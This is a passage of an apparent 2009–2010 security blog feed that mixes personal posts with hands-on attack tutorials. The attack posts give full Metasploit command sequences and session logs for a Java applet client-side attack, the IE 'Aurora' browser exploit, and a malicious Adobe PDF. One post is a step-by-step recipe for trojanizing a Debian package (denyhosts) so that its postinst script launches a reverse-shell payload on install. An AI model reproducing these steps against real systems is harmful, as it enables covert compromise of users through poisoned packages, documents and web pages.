false&lt;br /&gt;ExitOnSession =&gt; false&lt;br /&gt;resource (src/program_junk/meta_config)&gt; exploit -j&lt;br /&gt;[*] Exploit running as background job.&lt;br /&gt;msf exploit(handler) &gt;&lt;br /&gt;[*] Started reverse handler on 192.168.20.1:4444&lt;br /&gt;[*] Starting the payload handler...&lt;br /&gt;&lt;br /&gt;msf exploit(handler) &gt;&lt;br /&gt;&lt;br /&gt;The client goes to the fatefull page http://192.168.20.1  and gets the google search page and  runs the java applet. You need to have java installed on client side. &lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_lykLWWERH1Q/S3KMs7aes6I/AAAAAAAAABM/uaXBgudfHKM/s1600-h/pwned.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 210px;" src="http://2.bp.blogspot.com/_lykLWWERH1Q/S3KMs7aes6I/AAAAAAAAABM/uaXBgudfHKM/s320/pwned.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5436562403680498594" /&gt;&lt;/a&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;msf exploit(handler) &gt; [*] Sending stage (725504 bytes)&lt;br /&gt;[*] Meterpreter session 1 opened (192.168.20.1:4444 -&gt; 192.168.20.4:1123)&lt;br /&gt;&lt;br /&gt;msf exploit(handler) &gt; &lt;span style="font-weight:bold;"&gt;sessions&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Active sessions&lt;br /&gt;===============&lt;br /&gt;&lt;br /&gt;  Id  Description  Tunnel&lt;br /&gt;  --  -----------  ------&lt;br /&gt;  1   Meterpreter  192.168.20.1:4444 -&gt; 192.168.20.4:1123&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Review a video here on the use of SET :&lt;br /&gt;&lt;a href="http://vimeo.com/groups/33570/videos/8450443"&gt;http://vimeo.com/groups/33570/videos/8450443&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;SET will introduce a version 0.4 soon, with this, you can even sign the java applets yourself.&lt;br /&gt;Review a video here on the new version of SET :&lt;br /&gt;&lt;a href="http://vimeo.com/9198233"&gt;http://vimeo.com/9198233&lt;/a&gt;&lt;br /&gt;Metasploit on the other hand loaded to trunk a java_applet module, with an excellent rank. I have tested it  against firefox, ie. It works wonders.&lt;br /&gt;&lt;br /&gt;For the metasploit module, there is a good tutorial to follow through at paul dot com. The link is &lt;a href="http://pauldotcom.com/wiki/index.php/Episode185."&gt;http://pauldotcom.com/wiki/index.php/Episode185&lt;/a&gt; The tutorial is easy to understand and follow.&lt;br /&gt;&lt;br /&gt;Try out the clone feature on SET that downloads the url you give it and embeds the java applet on it.&lt;br /&gt;&lt;br /&gt;As for pdf attacks, the procedure is the same , try out the adobe attacks and especially the " Adobe PDF Embedded EXE Social Engineering" on SET and on metasploit it’s the exploit windows/fileformat/adobe_pdf_embedded_exe. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;References:&lt;br /&gt;http://www.attackresearch.com&lt;br /&gt;http://www.social-engineer.org&lt;br /&gt;http://pauldotcom.com&lt;br /&gt;http://metasploit.com&lt;br /&gt;Credits: David Kennedy, Valsmith, hdm and the metasploit crew, Carlos perez, pauldotcom crew,muts&lt;br /&gt;&lt;br /&gt;Happy client side hacking&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-8536380347258521070?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/8536380347258521070/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/02/client-side-exploits_10.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/8536380347258521070'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/8536380347258521070'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/02/client-side-exploits_10.html' title='Client Side exploits'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_lykLWWERH1Q/S3KMs7aes6I/AAAAAAAAABM/uaXBgudfHKM/s72-c/pwned.JPG' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-754449628500783630</id><published>2010-01-17T21:36:00.000-08:00</published><updated>2010-01-17T21:41:06.427-08:00</updated><title type='text'>Aurora Attack</title><content type='html'>By now, u know about Google being hacked by china. The exploit used has been ported to metasploit. It works also on XP SP2&lt;br /&gt;&lt;br /&gt;msf &gt; use exploit/windows/browser/ie_aurora&lt;br /&gt;msf exploit(ie_aurora) &gt; set SRVHOST 192.168.25.1&lt;br /&gt;msf exploit(ie_aurora) &gt; set URIPATH /&lt;br /&gt;msf exploit(ie_aurora) &gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;msf exploit(ie_aurora) &gt; set LHOST 192.168.25.1&lt;br /&gt;msf exploit(ie_aurora) &gt; exploit -j&lt;br /&gt;msf exploit(ie_aurora) &gt; exploit -j&lt;br /&gt;msf exploit(ie_aurora) &gt; [*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 192.168.25.7&lt;br /&gt;[*] Sending stage (723456 bytes)&lt;br /&gt;[*] Meterpreter session 1 opened (192.168.25.1:4444 -&gt; 192.168.25.7:1196)&lt;br /&gt;msf exploit(ie_aurora) &gt; sessions&lt;br /&gt;&lt;br /&gt;Active sessions&lt;br /&gt;===============&lt;br /&gt;&lt;br /&gt;  Id  Description  Tunnel&lt;br /&gt;  --  -----------  ------&lt;br /&gt;  1   Meterpreter  192.168.25.1:4444 -&gt; 192.168.25.7:1196&lt;br /&gt;&lt;br /&gt;msf exploit(ie_aurora) &gt; sessions -i 1&lt;br /&gt;msf exploit(ie_aurora) &gt; sessions -i 1&lt;br /&gt;[*] Starting interaction with 1...&lt;br /&gt;&lt;br /&gt;meterpreter &gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-754449628500783630?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/754449628500783630/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/01/aurora-attack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/754449628500783630'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/754449628500783630'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/01/aurora-attack.html' title='Aurora Attack'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-7215738627975622860</id><published>2010-01-15T08:08:00.000-08:00</published><updated>2010-01-15T08:22:25.305-08:00</updated><title type='text'>The God of Rainbows</title><content type='html'>I promised God, i would tell of this, although many months late, i have to give Him praise. With the kind of speeds we have been having in Kenya ~20Kbps, i always wandered for many years how i would get my hands on rainbow tables ~100Gb. So i made a silent prayer,God answered me about 6 months ago, and i will be forever grateful. Something that could have taken me about 7 months to complete took an overnight. That night in July in 2009, God came through for me.The speeds bumped from 20Kbps to 5Mbps. To Him be the glory, honor and praise. Wonder what rainbow tables can crack, check the following link&lt;br /&gt;http://cracker.offensive-security.com/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_lykLWWERH1Q/S1CVj0r7oEI/AAAAAAAAABE/pS2TL7ydg7U/s1600-h/snapshot4.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://1.bp.blogspot.com/_lykLWWERH1Q/S1CVj0r7oEI/AAAAAAAAABE/pS2TL7ydg7U/s320/snapshot4.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5427001993652314178" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-7215738627975622860?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/7215738627975622860/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/01/god-of-rainbows.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/7215738627975622860'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/7215738627975622860'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2010/01/god-of-rainbows.html' title='The God of Rainbows'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_lykLWWERH1Q/S1CVj0r7oEI/AAAAAAAAABE/pS2TL7ydg7U/s72-c/snapshot4.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-3392192777256083715</id><published>2009-12-17T21:10:00.000-08:00</published><updated>2009-12-17T21:22:47.887-08:00</updated><title type='text'>New Adobe 0 Day</title><content type='html'>Metasploit has released a new adobe exploit adobe_media_player .&lt;br /&gt;http://www.metasploit.com/redmine/projects/framework/repository/revisions/7882/entry/modules/exploits/windows/fileformat/adobe_media_newplayer.rb&lt;br /&gt;&lt;br /&gt;I managed to ger meterpreter/reverse_tcp when running XP Sp3 with DEP turned off. When DEP was turned on, it was resulting to a DOS.&lt;br /&gt;&lt;br /&gt;The offensive-security team have released a video for the same&lt;br /&gt;http://www.offensive-security.com/blog/backtrack/bt4-adobe-0days-and-other-updates/&lt;br /&gt;&lt;br /&gt;Adobe say the patch will come out in Jan 12.&lt;br /&gt;http://blogs.adobe.com/asset/2009/12/background_on_reader_update_sh.html&lt;br /&gt;&lt;br /&gt;Dont open suspicious pdf`s till then.&lt;br /&gt;&lt;br /&gt;Merry Christmas.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-3392192777256083715?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/3392192777256083715/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/12/new-adobe-0-day.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3392192777256083715'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3392192777256083715'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/12/new-adobe-0-day.html' title='New Adobe 0 Day'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-6515714170319167592</id><published>2009-12-07T22:08:00.000-08:00</published><updated>2010-01-07T19:33:57.960-08:00</updated><title type='text'>Long trip (part 2)</title><content type='html'>M back from Uganda. It was such a joy meeting Johnny and Jen.  They are doing great work, currently setting up training lab and a cyber for the kids. I was pleased to see the new building for the cyber and Johnny shared what he plans to do. Its just amazing to see and be apart of what these great people are doing. They have sacrificed so much and i cant help but admire them more.I learnt one major lesson: its what you do with the what you have that matters. I will surely go back for a second visit. It was a really humbling meeting such a noble family. God bless u more and increase you. Thanks.&lt;br /&gt;http://www.hackersforcharity.org/long-journey/charles-from-nairobi/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-6515714170319167592?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/6515714170319167592/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/12/long-trip-part-2.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/6515714170319167592'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/6515714170319167592'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/12/long-trip-part-2.html' title='Long trip (part 2)'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-4175182858490507473</id><published>2009-12-01T01:29:00.000-08:00</published><updated>2009-12-01T01:42:32.775-08:00</updated><title type='text'>Long trip</title><content type='html'>M going tomorrow on a small trip to visit Long. Yes Johnny Long. M a little scared inside. I have read all his books and he is the one person i look up to. i totally respect him for not only the elite skills but for the sacrifice he made to come to Uganda. He is not ashamed to love Christ :). I remember i even used his line in my final project "&lt;span style="font-style:italic;"&gt;Thanks first to Christ without whom I am nothing&lt;/span&gt;."  It will be a 15 hrs bus ride from where i live. I hope all goes well n i hope i also get a cool i hack charities t-shirt. will blog soon.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-4175182858490507473?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/4175182858490507473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/12/long-trip.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/4175182858490507473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/4175182858490507473'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/12/long-trip.html' title='Long trip'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-3222351899771513140</id><published>2009-12-01T01:27:00.000-08:00</published><updated>2009-12-01T01:29:27.573-08:00</updated><title type='text'>Attacking Mssql Servers with metasploit</title><content type='html'>Thanks to darkoperator for this. Its so comprehesive and nicely laid out.Thumbs up.&lt;br /&gt;&lt;br /&gt;http://www.darkoperator.com/blog/2009/11/27/attacking-mssql-with-metasploit.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-3222351899771513140?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/3222351899771513140/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/12/attacking-mssql-servers-with-metasploit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3222351899771513140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3222351899771513140'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/12/attacking-mssql-servers-with-metasploit.html' title='Attacking Mssql Servers with metasploit'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-3234884949051091570</id><published>2009-11-12T16:45:00.001-08:00</published><updated>2009-11-12T16:45:29.086-08:00</updated><title type='text'>Fun with linux payloads and linux packages</title><content type='html'>Just thot i should write a small tutorial on infecting .deb`s or .rpms with linux payloads.&lt;br /&gt;&lt;br /&gt;First, download the package you are going to infect, for my test case m going to use denyhosts package.Its a simple package to drop ssh attacks. So from console type&lt;br /&gt;&lt;br /&gt;apt-get install denyhosts&lt;br /&gt;&lt;br /&gt;I then navigate to /var/cache/apt/archives/ on my backtrack4 machine, copy the denyhosts.deb package to another location for modification.On the new location extract the contents of the denyhosts.deb package by typing&lt;br /&gt;&lt;br /&gt;dpkg -x denyhosts_2.6-5_all.deb test&lt;br /&gt;&lt;br /&gt;This will create a folder called test with the contents of the package.A simple ls reveals the following folders:&lt;br /&gt;etc  usr  var  workdir&lt;br /&gt;&lt;br /&gt;Go to msfpayload and generate yor payload. On my backtrack4 ,i prefer the linux/x86/shell/reverse_tcp.so on console,i type the following.&lt;br /&gt;&lt;br /&gt;/pentest/exploits/framework3/msfpayload linux/x86/shell/reverse_tcp LHOST=&lt;your ip&gt; LPORT=4444 X &gt; linux_payload&lt;br /&gt;&lt;br /&gt;This creates a payload called linuxpayload in your current directory.&lt;br /&gt; &lt;br /&gt;Create a folder called DEBIAN,and in the folder create two files . control and postinst. A simple control file is for defining the package. My control file looks like the one below.&lt;br /&gt;&lt;br /&gt;Package: denyhosts&lt;br /&gt;Version: 2.2&lt;br /&gt;Section: system&lt;br /&gt;Priority:Optional&lt;br /&gt;Architecture: i386&lt;br /&gt;Maintainer: Ubuntu dvelopers&lt;br /&gt;Description: Denyhosts&lt;br /&gt;&lt;br /&gt;For the postinst file, make the file executable.  contents of the postinst file  should contain the payload you want to execute and the path the payload will be copied. my postinst file looks like this.&lt;br /&gt;&lt;br /&gt;#!/bin/sh&lt;br /&gt;chmod 2755 /usr/share/denyhosts/linux_payload &amp;&amp; /usr/share/denyhosts/linux_payload &amp;&lt;br /&gt;&lt;br /&gt;For this to work, copy your payload (linux_payload) to the extracted foler (test) and paste in in test/usr/share/denyhosts&lt;br /&gt;&lt;br /&gt;now we are ready to build the debian package. From console,type the following&lt;br /&gt;&lt;br /&gt;dpkg-deb --build test&lt;br /&gt;&lt;br /&gt;It will create a malicious .deb package inside the test folder. Start the explot/multi/handler to handle your sessions. Scp the debian package to another machine and install it with the common dpkg -i [package_name] option. Immediately the package is installed, you should recieve a reverse shell on your machine.&lt;br /&gt;&lt;br /&gt;I dont have any rpm based system at the moment but hope somebody tries it out .&lt;br /&gt;Lesson:Dont install packages from people you dont trust.&lt;br /&gt;&lt;br /&gt;Happy hacking.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-3234884949051091570?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/3234884949051091570/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/11/fun-with-linux-payloads-and-linux.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3234884949051091570'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/3234884949051091570'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/11/fun-with-linux-payloads-and-linux.html' title='Fun with linux payloads and linux packages'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-5000428403982807780</id><published>2009-10-30T06:11:00.000-07:00</published><updated>2009-10-30T06:14:35.343-07:00</updated><title type='text'>LMAO!!!</title><content type='html'>Today i was just idle, reading stuff from sans.org reading room, then i started idle browsing. Landed these two links that made my day.&lt;br /&gt;&lt;br /&gt;http://www.darknet.org.uk/category/retards/&lt;br /&gt;&lt;br /&gt;http://thepiratebay.org/legal&lt;br /&gt;&lt;br /&gt;If you know of any other, please share.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-5000428403982807780?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/5000428403982807780/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/10/lmao.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/5000428403982807780'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/5000428403982807780'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/10/lmao.html' title='LMAO!!!'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-5965896695269999875</id><published>2009-09-23T02:44:00.000-07:00</published><updated>2009-10-01T01:23:34.066-07:00</updated><title type='text'>Metasploit Unleashed</title><content type='html'>The metasploit unleashed course is out &lt;p&gt; http://www.offensive-security.com/metasploit-unleashed/&lt;br /&gt;Its a really good detailed course on basic and advanced features of metasploit. I have gone through it and i can say its great.&lt;br /&gt;&lt;br /&gt;Oh and another thing, found this mesh plugin quite useful during info gathering. Greets to Andrew MacPherson and Roelf T.&lt;br /&gt;http://www.social-engineer.org/blog/resources/&lt;br /&gt;Get the mesh plugin at the end of the page.&lt;br /&gt;Check out the vid here. http://www.paterva.com/mesh.mp4&lt;br /&gt;&lt;br /&gt;Happy hunting for pizza . :). B good&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-5965896695269999875?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/5965896695269999875/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/09/metasploit-unleashed.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/5965896695269999875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/5965896695269999875'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/09/metasploit-unleashed.html' title='Metasploit Unleashed'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_lykLWWERH1Q/SawaE-BQRcI/AAAAAAAAAAM/cv_mJ4wD_yM/S220/frio_1152.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3698095189200084393.post-6625240720855461744</id><published>2009-09-18T23:53:00.000-07:00</published><updated>2009-09-19T00:02:58.786-07:00</updated><title type='text'>What am i not doing right?</title><content type='html'>Hi,&lt;br /&gt;Its been around 1 month since colin ames and valsmith of metasploit released metasphish  and adobe_pdf exploit  (http://blog.attackresearch.com/publications/metaphish). been trying adobe_pdf exploit for almost a month, After i transfer the pdf file to windows, i still get a "c:\\windows\system32\cmd.exe /Q /C (if exist "%HOMEPATH%\My Documents\hi.pdf" (cd "%HOMEPATH%\My Documents"))&amp;(if exist "%HOMEPATH%\Desktop\hi.pdf" (cd "%HOMEPATH%\Desktop"))&amp;&amp;(ren hi.pdf hi.exe&amp;start hi.exe)" error and another error "system cannot find the specified file" on cmd. and my multi/handler doesnt pick up any reverse shells. M using adobe 9 on windows. M saving the pdf to my windows desktop.Any pointers will be appreciated. log is shown below. I have also tried out a new adobe_pdf module by peterhefley here. http://trac.metasploit.com/ticket/335.&lt;br /&gt;Pointerz pliz.................&lt;br /&gt;&lt;br /&gt;msf exploit(handler) &gt; back&lt;br /&gt;msf &gt; use exploit/windows/fileformat/adobe_pdf_embedded_exe&lt;br /&gt;msf exploit(adobe_pdf_embedded_exe) &gt; set LHOST 192.168.20.1&lt;br /&gt;LHOST =&gt; 192.168.20.1&lt;br /&gt;msf exploit(adobe_pdf_embedded_exe) &gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;PAYLOAD =&gt; windows/meterpreter/reverse_tcp&lt;br /&gt;msf exploit(adobe_pdf_embedded_exe) &gt; set INFILENAME hi.pdf&lt;br /&gt;INFILENAME =&gt; hi.pdf&lt;br /&gt;msf exploit(adobe_pdf_embedded_exe) &gt; exploit&lt;br /&gt;&lt;br /&gt;[*] Handler binding to LHOST 0.0.0.0&lt;br /&gt;[*] Started reverse handler&lt;br /&gt;[*] Reading in 'hi.pdf'...&lt;br /&gt;[*] Parseing 'hi.pdf'...&lt;br /&gt;[*] Parseing Successfull.&lt;br /&gt;[*] Using 'windows/meterpreter/reverse_tcp' as payload...&lt;br /&gt;[*] Creating 'evil.pdf' file...&lt;br /&gt;[*] Generated output file /pentest/exploits/framework3/data/exploits/evil.pdf&lt;br /&gt;[*] Exploit completed, but no session was created.&lt;br /&gt;msf exploit(adobe_pdf_embedded_exe) &gt;&lt;br /&gt;&lt;br /&gt;msf exploit(adobe_pdf_embedded_exe) &gt; use exploit/multi/handler&lt;br /&gt;msf exploit(handler) &gt; set LHOST 192.168.20.1&lt;br /&gt;LHOST =&gt; 192.168.20.1&lt;br /&gt;msf exploit(handler) &gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;PAYLOAD =&gt; windows/meterpreter/reverse_tcp&lt;br /&gt;msf exploit(handler) &gt; set ExitOnSession false&lt;br /&gt;ExitOnSession =&gt; false&lt;br /&gt;msf exploit(handler) &gt; exploit&lt;br /&gt;&lt;br /&gt;[*] Handler binding to LHOST 0.0.0.0&lt;br /&gt;[*] Started reverse handler&lt;br /&gt;[*] Starting the payload handler...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3698095189200084393-6625240720855461744?l=netsecuritystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://netsecuritystuff.blogspot.com/feeds/6625240720855461744/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/09/what-am-i-not-doing-right.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/6625240720855461744'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3698095189200084393/posts/default/6625240720855461744'/><link rel='alternate' type='text/html' href='http://netsecuritystuff.blogspot.com/2009/09/what-am-i-not-doing-right.html' title='What am i not doing right?'/><author><name>charles watathi</name><uri>http://www.blogger.com/profile/08205332659033374015</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 